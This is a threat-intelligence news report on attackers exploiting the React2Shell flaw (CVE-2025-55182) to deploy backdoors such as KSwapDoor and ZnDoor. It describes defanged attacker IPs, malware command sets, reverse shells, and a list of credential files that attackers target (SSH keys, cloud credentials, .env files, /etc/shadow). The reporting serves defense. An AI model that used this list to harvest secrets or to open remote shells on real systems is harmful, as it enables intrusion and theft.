The security issue referred to as React2Shell is actively abused by threat actors as an initial access vector to push malware families like KSwapDoor and ZnDoor, based on analysis from Palo Alto Networks Unit 42 and NTT Security.

“KSwapDoor is a professionally developed remote access tool built for stealthy, long‑term access,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.

“It establishes an internal mesh across compromised servers so they can relay traffic for one another and work around network controls. It relies on strong encryption to obfuscate C2 traffic and includes a ‘sleeper’ mode that lets operators keep it dormant behind firewalls until it’s reactivated using a covert trigger.”

The cybersecurity company noted that the malware had earlier been incorrectly labeled as BPFDoor, and clarified that this Linux backdoor supports interactive shells, arbitrary command execution, file management, and network scanning for lateral movement. It also masquerades as a legitimate Linux kernel swap daemon to blend into normal host activity and avoid basic detections.

In parallel, NTT Security said that organizations in Japan are facing campaigns that abuse React2Shell to deploy ZnDoor, a malware strain assessed to have been observable in the wild since December 2023. The observed kill chains run a bash one‑liner that retrieves the payload from a remote server (45.76.155[.]14) using wget and then executes it.

This remote access trojan then connects back to the same attacker‑controlled infrastructure to receive tasking and execute it on the compromised host. Supported commands include, but are not limited to, the following:

• shell, to execute a single command
• interactive_shell, to start an interactive shell session
• explorer, to enumerate directory contents
• explorer_cat, to read and print a file
• explorer_delete, to remove a file
• explorer_upload, to pull a file from the C2 server to the host
• explorer_download, to exfiltrate files from the host to the C2 server
• system, to collect system inventory data
• change_timefile, to modify file timestamps (anti‑forensics)
• socket_quick_startstreams, to spin up a SOCKS5 proxy
• start_in_port_forward, to initiate port forwarding
• stop_in_port, to terminate port forwarding

This activity is unfolding while the vulnerability, cataloged as CVE-2025-55182 (CVSS score: 10.0), is being leveraged by multiple threat clusters. Google has identified at least five China‑nexus groups operationalizing the exploit chain to deploy a range of tooling and payloads:

• UNC6600, deploying a tunneling utility named MINOCAT
• UNC6586, deploying a downloader known as SNOWLIGHT
• UNC6588, deploying a backdoor referred to as COMPOOD
• UNC6603, deploying a newer Go backdoor variant called HISONIC that relies on Cloudflare Pages and GitLab to retrieve encrypted configuration data and blend its network traffic with legitimate services
• UNC6595, deploying a Linux build of ANGRYREBEL (aka Noodle RAT)

Microsoft, in its own advisory for CVE-2025-55182, stated that threat actors are using the bug to run arbitrary commands in post‑exploitation stages. Observed behavior includes establishing reverse shells to known Cobalt Strike infrastructure, deploying remote monitoring and management (RMM) agents such as MeshAgent, modifying the authorized_keys file, and enabling direct root logins.

Payloads seen in these operations include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. From a SOC perspective, the intrusions are notable for their use of Cloudflare Tunnel endpoints (“*.trycloudflare.com”) to bypass perimeter controls, followed by in‑environment reconnaissance to map assets, move laterally, and harvest credentials.

According to Microsoft, the credential theft phase targets Azure Instance Metadata Service (IMDS) endpoints across Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud to obtain identity tokens that can be used to deepen access into cloud estates.

“Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets,” the Microsoft Defender Security Research Team said. “We additionally observed attempts to obtain AI- and cloud‑native credentials, such as OpenAI API keys, Databricks tokens, and Kubernetes service‑account credentials. Azure Command-Line Interface (CLI) (az) and Azure Developer CLI (azd) were also abused to acquire tokens.”

In a separate campaign documented by Beelzebub, threat actors are exploiting weaknesses in Next.js, including CVE-2025-29927 and CVE-2025-66478 (the same React2Shell vulnerability before it was marked as a duplicate), to systematically pull credentials and other sensitive artifacts, such as:

• .env, .env.local, .env.production, .env.development
• System environment variables (printenv, env)
• SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519, /root/.ssh/*)
• Cloud credentials (~/.aws/credentials, ~/.docker/config.json)
• Git credentials (~/.git-credentials, ~/.gitconfig)
• Command history (last 100 commands from ~/.bash_history)
• System files (/etc/shadow, /etc/passwd)

The malware then establishes persistence to survive reboots, deploys a SOCKS5 proxy for covert traffic, opens a reverse shell to “67.217.57[.]240:888,” and installs a React scanner to search the internet for additional vulnerable targets, supporting automated propagation.

The operation, referred to as Operation PCPcat, is estimated to have already compromised 59,128 servers. “The campaign shows characteristics of large-scale intelligence operations and data exfiltration on an industrial scale,” the Italian company said.

The Shadowserver Foundation is currently tracking more than 111,000 IPs exposed to React2Shell exploitation, including over 77,800 instances in the U.S., followed by Germany (7,500), France (4,000), and India (2,300). GreyNoise data indicates 547 malicious IPs from the U.S., India, the U.K., Singapore, and the Netherlands were actively participating in exploitation attempts over the last 24 hours.

If this activity is relevant to your environment, consider subscribing to our updates on Google News, Twitter and LinkedIn to stay current on similar threat intelligence and technical coverage.